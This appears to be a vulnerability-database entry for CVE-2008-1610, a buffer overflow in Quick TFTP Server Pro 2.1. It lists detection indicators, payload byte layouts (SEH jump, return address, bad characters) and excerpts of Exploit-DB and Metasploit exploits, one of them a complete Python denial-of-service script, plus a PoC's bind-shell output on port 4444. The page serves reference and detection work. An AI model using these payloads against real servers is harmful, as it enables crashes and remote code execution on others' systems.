CVE-2008-1610
Published 2008-04-01
Priority P263 · high · 7.5 (CVSS 2.0) · AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 53.91% (98.9th percentile)
Stack-based buffer overflow in TallSoft Quick TFTP Server Pro 2.1 allows remote attackers to cause a denial of service or execute arbitrary code via a long mode field in a read or write request.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tallsoft_quick | tftp_server_pro | — | — |
Detection & IOCs (extracted from sources)
bytes: \x00\x02 + filename + \x00 + 'A'*1019 + \xeb\x08\x90\x90 + \x58\x14\xd3\x74 + \x90*16 + shellcode + \x00
bytes: \x00\x02 + 4-byte-random + \x00 + 'A'*1019 + SEH_payload + \x00
bytes: \x00\x02 + \x66\x69\x6c\x65\x2e\x74\x78\x74\x00 + 'A'*1200 + \x00
- Detect oversized TFTP WRQ/RRQ mode field: a UDP packet to port 69 with opcode \x00\x01 or \x00\x02 followed by a filename, a null byte, then a mode field exceeding ~1019 bytes is the attack pattern.
- The exploit payload begins with TFTP write-request opcode \x00\x02, making WRQ packets with abnormally long mode fields (>1000 bytes) a reliable detection trigger on UDP/69.
- SEH overwrite uses short JMP \xeb\x08\x90\x90 followed by return address \x58\x14\xd3\x74 (oledlg.dll on XP SP2); presence of this byte sequence in a TFTP mode field is a strong indicator of exploitation.
- Successful exploitation opens a bind shell on TCP port 4444; monitor for unexpected listening services on port 4444 on TFTP server hosts post-exploitation.
- Bad characters for payload construction are \x00\x20\x0a\x0d; shellcode in network traffic to UDP/69 avoiding these bytes in the mode field is characteristic of this exploit.
- MS Update KB926436 corrupts the oledlg.dll opcode address used by the exploit, causing a DoS instead of code execution; patched systems may still crash, so monitor for TFTP server process crashes.
- The Metasploit module targets two specific return addresses depending on OS; the oledlg.dll address (0x74D31458) is broken by MS KB926436 on patched XP SP2 systems, resulting in DoS only rather than code execution.
- Payload space is limited to 460 bytes with a stack adjustment of -3500; payloads larger than this will not function correctly with the Metasploit module.
No detection rules found.
Exploit-DB
Quick TFTP Server Pro 2.2 - Denial of Service (exploitdb · 2013-06-07)
---
#!/usr/bin/python
#Exploit Title: Quick TFTP Server 2.2 DoS
#Date: 6th June 2013
#Exploit Author: npn
#Exploit Author Homepage: http://www.iodigitalsec.com/
#Exploit Author Write Up: http://www.iodigitalsec.com/blog/fuzz-to-denial-of-service-quick-tftp-server-2-2/
#Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
#Software Link: http://www.tallsoft.com/tftpserver_setup.exe
#Version: 2.2
#Tested on: Windows XP SP3 English
from socket import *
import sys
import select
pwn = "\x00\x02"
pwn += "\x66\x69\x6c\x65\x2e\x74\x78\x74\x00"
pwn += "A"*1200
pwn += "\x00"
address = ('192.168.200.20', 69)
server_socket = socket(AF_INET, SOCK_DGRAM)
server_socket.sendto(pwn, address)
Exploit-DB
Quick TFTP Server Pro 2.1 - Transfer-Mode Overflow (Metasploit) (exploitdb · 2010-06-15)
---
##
# $Id: quick_tftp_pro_mode.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Quick FTP Pro 2.1 Transfer-Mode Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Quick TFTP Pro server
product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting
in a DoS. This is a port of a sploit by Mati "muts" Aharoni.
},
'Author' => 'Saint Patrick',
'Version' => '$Revision: 9525 $',
'Refer
Exploit-DB
Quick TFTP Server Pro 2.1 - Remote Overflow (SEH) (exploitdb · 2008-03-26)
---
#!/usr/bin/python
# Quick TFTP Pro 2.1 SEH Overflow (0day)
# Tested on Windows XP SP2.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/quick-tftp-poc.py.txt
#########################################################
# bt ~ # quickftp.py
# [*] Quick TFTP Pro 2.1 SEH Overflow (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.130 4444
# (UNKNOWN) [172.16.167.130] 4444 (krb524) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator>
##########################################################
import socket
import sys
print
Metasploit
Quick FTP Pro 2.1 Transfer-Mode Overflow
This module exploits a stack buffer overflow in the Quick TFTP Pro server product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting in a DoS. This is a port of a sploit by Mati "muts" Aharoni.
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/29494
- http://www.offensive-security.com/0day/quick-tftp-poc.py.txt
- http://www.securityfocus.com/bid/28459
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41499
- https://www.exploit-db.com/exploits/5315